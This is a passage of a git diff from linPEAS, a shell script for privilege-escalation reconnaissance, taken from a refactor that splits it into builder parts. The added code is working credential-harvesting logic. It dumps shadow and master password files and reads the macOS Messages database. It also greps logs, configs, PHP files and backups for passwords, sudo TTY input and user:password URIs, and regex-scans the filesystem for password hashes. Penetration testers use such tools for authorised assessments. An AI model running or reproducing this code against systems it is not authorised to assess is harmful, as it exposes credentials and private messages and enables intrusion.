/etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Writable in passwd file +print_list "Writable passwd file? ................ " +if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Credentials in fstab +print_list "Credentials in fstab/mtab? ........... " +if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Read shadow files +print_list "Can I read shadow files? ............. " +if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +print_list "Can I read shadow plists? ............ " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +print_list "Can I write shadow plists? ........... " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +##-- IF) Read opasswd file +print_list "Can I read opasswd file? ............. " +if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" +else echo_no +fi + +##-- IF) network-scripts +print_list "Can I write in network-scripts? ...... " +if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Read root dir +print_list "Can I read root folder? .............. " +(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no +echo "" + +##-- IF) Root files in home dirs +print_2title "Searching root files in home dirs (limit 30)" +(find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found +echo "" + +##-- IF) Others files in my dirs +if ! [ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" + echo "" +fi + +##-- IF) Readable files belonging to root and not world readable +if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found + echo "" +fi + +##-- IF) Modified interesting files into specific folders in the last 5mins +print_2title "Modified interesting files in the last 5mins (limit 100)" +find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," +echo "" + +##-- IF) Writable log files +print_2title "Writable log files (logrotten) (limit 100)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" +logrotate --version 2>/dev/null || echo_not_found "logrotate" +lastWlogFolder="ImPOsSiBleeElastWlogFolder" +logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) +printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi + fi +done + +echo "" + +##-- IF) Files inside my home +print_2title "Files inside $HOME (limit 20)" +(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found +echo "" + +##-- IF) Files inside /home +print_2title "Files inside others home (limit 20)" +(find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found +echo "" + +##-- IF) Mail applications +print_2title "Searching installed mail applications" +ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" +echo "" + +##-- IF) Mails +print_2title "Mails (limit 50)" +(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found +echo "" + +##-- IF) Backup folders +print_2title "Backup folders" +printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" +done +echo "" + +##-- IF) Backup files +print_2title "Backup files (limited 100)" +backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) +printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; +done +echo "" + +##-- IF) DB files +if [ "$MACPEAS" ]; then + print_2title "Reading messages database" + sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null + +fi +print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" +FILECMD="$(command -v file 2>/dev/null)" +if [ "$PSTORAGE_DATABASE" ]; then + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if [ "$FILECMD" ]; then + echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + else + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + fi + done + SQLITEPYTHON="" + echo "" + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC + if [ "$(command -v sqlite3 2>/dev/null)" ]; then + tables=$(sqlite3 $f ".tables" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then + SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) + tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + else + tables="" + fi + if [ "$tables" ]; then + printf "%s\n" "$tables" | while read t; do + columns="" + # Search for credentials inside the table using sqlite3 + if [ -z "$SQLITEPYTHON" ]; then + columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") + # Search for credentials inside the table using python + else + columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) + fi + #Check found columns for interesting fields + INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") + if [ "$INTCOLUMN" ]; then + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" + (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + fi + done + echo "" + fi + fi + done +fi +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Downloaded Files" + sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +fi + +##-- IF) Web files +print_2title "Web files?(output limit)" +ls -alhR /var/www/ 2>/dev/null | head +ls -alhR /srv/www/htdocs/ 2>/dev/null | head +ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head +ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head +echo "" + +##-- IF) All hidden files +print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 +echo "" + +##-- IF) Readable files in /tmp, /var/tmp, bachups +print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" +filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) +printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done +echo "" + +##-- IF) Interesting writable files by ownership or all +if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$obmowbe" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + echo "" +fi + +##-- IF) Interesting writable files by group +if ! [ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + for g in $(groups); do + printf " Group $GREEN$g:\n$NC"; + iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$iwfbg" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -Eq "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + done + echo "" +fi + +##-- IF) Passwords in config PHP files +print_2title "Searching passwords in config PHP files" +printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done +echo "" + +##-- IF) TTY passwords +print_2title "Checking for TTY (sudo/su) passwords in audit logs" +aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" +find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" +echo "" + +##-- IF) IPs inside logs +print_2title "Finding IPs inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 +echo "" + +##-- IF) Passwords inside logs +print_2title "Finding passwords inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," +echo "" + +##-- IF) Emails inside logs +print_2title "Finding emails inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" +echo "" + +##-- IF) Passwords files in home +print_2title "Finding *password* or *credential* files in home (limit 70)" +(printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found +echo "" + +if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Find possible files with passwords + print_2title "Finding passwords inside key folders (limit 70) - only PHP files" + intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) + printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + print_2title "Finding passwords inside key folders (limit 70) - no PHP files" + printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + ##-- IF) Find possible files with passwords + print_2title "Finding possible password variables inside key folders (limit 140)" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + echo "" + + ##-- IF) Find possible conf files with passwords + print_2title "Finding possible password in config files" + ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + printf "%s\n" "$ppicf" | while read f; do + if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then + echo "$ITALIC $f$NC" + grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" + fi + done + echo "" + + ##-- IF) Find possible files with usernames + print_2title "Finding 'username' string inside key folders (limit 70)" + timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + echo "" + + ##-- IF) Specific hashes inside files + print_2title "Searching specific hashes inside files - less false positives (limit 70)" + regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' + regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' + regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' + regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' + regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' + regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' + regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' + timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Specific hashes inside files + print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" + regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' + regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' + regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' + regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' + timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," + echo "" +fi + +if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then + ##-- IF) Find URIs with user:password@hoststrings + print_2title "Finding URIs with user:password@host inside key folders" + timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + echo "" +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_base.sh b/linPEAS/builder/linpeas_parts/linpeas_base.sh similarity index 56% rename from linPEAS/builder/linpeas_base.sh rename to linPEAS/builder/linpeas_parts/linpeas_base.sh index 06abb7d..df6fc85 100755 --- a/linPEAS/builder/linpeas_base.sh +++ b/linPEAS/builder/linpeas_parts/linpeas_base.sh @@ -56,7 +56,7 @@ NOTEXPORT="" DISCOVERY="" PORTS="" QUIET="" -CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" +CHECKS="peass{CHECKS}" WAIT="" PASSWORD="" NOCOLOR="" @@ -77,7 +77,7 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW}-N${BLUE} Do not use colours ${YELLOW}-v${BLUE} Verbose execution ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. + ${YELLOW}-o${BLUE} Only execute selected checks (peass{CHECKS}). Select a comma separated list. ${YELLOW}-L${BLUE} Force linpeas execution. ${YELLOW}-M${BLUE} Force macpeas execution. ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 @@ -1100,2326 +1100,13 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil fi -if echo $CHECKS | grep -q SysI; then - ########################################### - #-------------) System Info (-------------# - ########################################### - print_title "System Information" - #-- SY) OS - print_2title "Operative system" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" - (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} 